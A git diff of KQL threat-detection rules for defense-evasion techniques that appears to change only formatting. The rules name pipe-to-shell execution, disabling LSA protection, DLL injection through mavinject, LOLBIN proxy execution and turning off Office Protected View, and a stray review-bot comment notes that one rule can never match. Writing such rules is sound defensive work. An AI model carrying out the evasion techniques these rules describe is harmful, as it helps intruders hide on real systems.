-// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-09
-// Level: low
-// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070
-// False Positives:
-// - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).
-
-DeviceProcessEvents
+// Title: Linux Package Uninstall
+// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: low
+// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "remove" or ProcessCommandLine contains "purge") and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--remove " or ProcessCommandLine contains " -r ") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains " -e " and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "erase" or ProcessCommandLine contains "remove") and FolderPath endswith "/yum")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql
index 0131181d..33a42a90 100644
--- a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql
+++ b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql
@@ -1,12 +1,12 @@
-// Title: Linux Shell Pipe to Shell
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-14
-// Level: medium
-// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140
-// False Positives:
-// - Legitimate software that uses these patterns
-
-DeviceProcessEvents
+// Title: Linux Shell Pipe to Shell
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate software that uses these patterns
+
+DeviceProcessEvents
 | where (ProcessCommandLine startswith "sh -c " or ProcessCommandLine startswith "bash -c ") and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash" or ProcessCommandLine endswith " |sh"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation.kql b/KQL/rules/Defense Evasion/livekd_driver_creation.kql
index bc4f6a1c..50f9001f 100644
--- a/KQL/rules/Defense Evasion/livekd_driver_creation.kql
+++ b/KQL/rules/Defense Evasion/livekd_driver_creation.kql
@@ -1,12 +1,12 @@
-// Title: LiveKD Driver Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-16
-// Level: medium
-// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation
-// False Positives:
-// - Legitimate usage of LiveKD for debugging purposes will also trigger this
-
-DeviceFileEvents
+// Title: LiveKD Driver Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Legitimate usage of LiveKD for debugging purposes will also trigger this
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql
index b9eca040..0444f8ca 100644
--- a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql
+++ b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql
@@ -1,12 +1,12 @@
-// Title: LiveKD Driver Creation By Uncommon Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-16
-// Level: high
-// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation
-// False Positives:
-// - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter
-
-DeviceFileEvents
+// Title: LiveKD Driver Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter
+
+DeviceFileEvents
 | where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql
index a424efd2..e06764b1 100644
--- a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql
+++ b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql
@@ -1,12 +1,12 @@
-// Title: LiveKD Kernel Memory Dump File Created
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-16
-// Level: high
-// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation
-// False Positives:
-// - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
-
-DeviceFileEvents
+// Title: LiveKD Kernel Memory Dump File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
+
+DeviceFileEvents
 | where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
index e7ac1c5e..1b4ef6c4 100644
--- a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
+++ b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
@@ -1,10 +1,10 @@
-// Title: LOL-Binary Copied From System Directory
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-29
-// Level: high
-// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.003
-
-DeviceProcessEvents
+// Title: LOL-Binary Copied From System Directory
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-29
+// Level: high
+// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql
index 742abfac..18e0d02a 100644
--- a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql
+++ b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql
@@ -1,10 +1,10 @@
-// Title: Lolbin Runexehelper Use As Proxy
-// Author: frack113
-// Date: 2022-12-29
-// Level: medium
-// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Lolbin Runexehelper Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\runexehelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql
index 0a173df7..4ebe6505 100644
--- a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql
+++ b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql
@@ -1,10 +1,10 @@
-// Title: Lolbin Unregmp2.exe Use As Proxy
-// Author: frack113
-// Date: 2022-12-29
-// Level: medium
-// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Lolbin Unregmp2.exe Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -HideWMP" or ProcessCommandLine contains " /HideWMP" or ProcessCommandLine contains " –HideWMP" or ProcessCommandLine contains " —HideWMP" or ProcessCommandLine contains " ―HideWMP") and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql
index 8f9f4436..601077fd 100644
--- a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: LSA PPL Protection Disabled Via Reg.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-22
-// Level: high
-// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.010
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: LSA PPL Protection Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-22
+// Level: high
+// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.010
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
index a455041d..163b5085 100644
--- a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
+++ b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
@@ -1,14 +1,14 @@
-// Title: Malicious PE Execution by Microsoft Visual Studio Debugger
-// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
-// Date: 2020-10-14
-// Level: medium
-// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
-// This option may be used adversaries to execute malicious code by signed verified binary.
-// The debugger is installed alongside with Microsoft Visual Studio package.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1218, attack.defense-evasion
-// False Positives:
-// - The process spawned by vsjitdebugger.exe is uncommon.
-
-DeviceProcessEvents
+// Title: Malicious PE Execution by Microsoft Visual Studio Debugger
+// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
+// Date: 2020-10-14
+// Level: medium
+// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
+// This option may be used adversaries to execute malicious code by signed verified binary.
+// The debugger is installed alongside with Microsoft Visual Studio package.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion
+// False Positives:
+// - The process spawned by vsjitdebugger.exe is uncommon.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
index a29cf4ec..d8c763af 100644
--- a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
+++ b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
@@ -1,13 +1,13 @@
-// Title: Malicious Windows Script Components File Execution by TAEF Detection
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020-10-13
-// Level: low
-// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
-// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - It's not an uncommon to use te.exe directly to execute legal TAEF tests
-
-DeviceProcessEvents
+// Title: Malicious Windows Script Components File Execution by TAEF Detection
+// Author: Agro (@agro_sev) oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
+// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - It's not an uncommon to use te.exe directly to execute legal TAEF tests
+
+DeviceProcessEvents
 | where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql
index 60e245fe..a8f212f6 100644
--- a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql
+++ b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql
@@ -1,10 +1,10 @@
-// Title: Mavinject Inject DLL Into Running Process
-// Author: frack113, Florian Roth
-// Date: 2021-07-12
-// Level: high
-// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
-
-DeviceProcessEvents
+// Title: Mavinject Inject DLL Into Running Process
+// Author: frack113, Florian Roth
+// Date: 2021-07-12
+// Level: high
+// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
index 7e5e0151..90821ff7 100644
--- a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
+++ b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
@@ -1,12 +1,12 @@
-// Title: MaxMpxCt Registry Value Changed
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-03-19
-// Level: low
-// Description: Detects changes to the "MaxMpxCt" registry value.
-// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
-// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.005
-
-DeviceRegistryEvents
+// Title: MaxMpxCt Registry Value Changed
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-19
+// Level: low
+// Description: Detects changes to the "MaxMpxCt" registry value.
+// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
+// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql
index e359d1c3..cc3a6a0c 100644
--- a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql
+++ b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql
@@ -1,12 +1,12 @@
-// Title: Microsoft Office DLL Sideload
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022-08-17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Microsoft Office DLL Sideload
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: high
+// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql b/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql
index 1d5faa31..88fbf6f7 100644
--- a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql
+++ b/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql
@@ -1,12 +1,12 @@
-// Title: Microsoft Office Protected View Disabled
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-06-08
-// Level: high
-// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Microsoft Office Protected View Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-06-08
+// Level: high
+// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql
index db6d28de..98ca15ba 100644
--- a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql
+++ b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql
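Review bot: The `| where` line carried over at the end of this hunk can never match: KQL `endswith` has no wildcard support, so `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*"` requires a key path that literally ends in `*`, which makes the whole Protected View rule dead after this regeneration. The line is context here, so the commit does not change it, but since these files appear to be converter output the likely cause is how a trailing-wildcard `endswith` pattern is translated, which is worth checking across the other generated rules. The intended scoping is a substring match: `| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Security\\ProtectedView") and (...)`, leaving the value-specific `endswith` terms as they are.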
@@ -1,12 +1,12 @@
-// Title: Modify Group Policy Settings
-// Author: frack113
-// Date: 2022-08-19
-// Level: medium
-// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Modify Group Policy Settings
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
index b0e242ea..7110ffa0 100644
--- a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
+++ b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
@@ -1,12 +1,12 @@
-// Title: MSDT Execution Via Answer File
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-13
-// Level: high
-// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution
-// False Positives:
-// - Possible undocumented parents of "msdt" other than "pcwrun".
-
-DeviceProcessEvents
+// Title: MSDT Execution Via Answer File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-13
+// Level: high
+// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Possible undocumented parents of "msdt" other than "pcwrun".
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ") and FolderPath endswith "\\msdt.exe") and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
index a312f3c6..1241c065 100644
--- a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
+++ b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
@@ -1,15 +1,15 @@
-// Title: MSHTA Execution with Suspicious File Extensions
-// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2019-02-22
-// Level: high
-// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
-// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
-// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
-// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceProcessEvents
+// Title: MSHTA Execution with Suspicious File Extensions
+// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-02-22
+// Level: high
+// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
+// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
+// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
+// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".avi" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".conf" or ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".gz" or ProcessCommandLine contains ".ini" or ProcessCommandLine contains ".jpe" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".json" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".mkv" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".mp4" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".tar" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml" or ProcessCommandLine contains ".yaml" or ProcessCommandLine contains ".yml" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains "vbscript") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "mshta.exe")
\ No newline at end of file
